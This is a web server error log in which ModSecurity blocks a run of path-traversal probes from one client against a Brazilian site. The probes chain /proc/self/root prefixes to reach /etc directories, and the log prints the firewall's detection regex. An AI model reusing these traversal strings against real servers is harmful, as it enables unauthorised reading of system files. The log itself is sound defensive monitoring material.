[Tue Mar 17 14:29:32.295960 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.241.31:59136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPfK4xEDsg_V3ESNZOGAAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:33.758565 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:59138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPfdY0UrI5A3LftIz9sQAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:35.230145 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.31:59152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPfweiSKl8TjouI-YbPwAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:36.727867 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:59168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPgPPqhzTj3BvfDX-JnwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:38.142279 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.241.31:34748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPgqt8Nd0UC_OcbVHMgwAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:44.126750 2026] [proxy_fcgi:error] [pid 28879:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36866] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:29:46.145397 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.31:34756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPir-sgTmmJoPuMdy4CgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:47.559411 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.241.31:36486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPi7-sgTmmJoPuMdy4DAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:48.988220 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.31:36500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPjAeiSKl8TjouI-YbQwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:50.462791 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.241.31:36508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPjq4xEDsg_V3ESNZOHwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:51.875381 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.241.31:36522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPj64xEDsg_V3ESNZOIQAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:53.447854 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.241.31:36524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPkat8Nd0UC_OcbVHMhQAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:54.859207 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:36536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPkq4xEDsg_V3ESNZOJQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:56.247194 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.31:36538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPlKBJNF7axNlVR0UZVQAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:57.606995 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.31:40180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPlb-sgTmmJoPuMdy4FQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:29:58.891760 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:40182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPlvPqhzTj3BvfDX-JpQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:00.229517 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:40186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPmPPqhzTj3BvfDX-JqAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:05.146769 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:40194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPm9Y0UrI5A3LftIz9vAAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:06.121843 2026] [proxy_fcgi:error] [pid 6296:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37260] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:30:06.451264 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.31:40196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPngeiSKl8TjouI-YbUAAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:08.031389 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:57560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPoKBJNF7axNlVR0UZXQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:09.403443 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.31:57564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPoQeiSKl8TjouI-YbWQAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:30:10.973933 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.241.31:57572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmPor-sgTmmJoPuMdy4GQAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
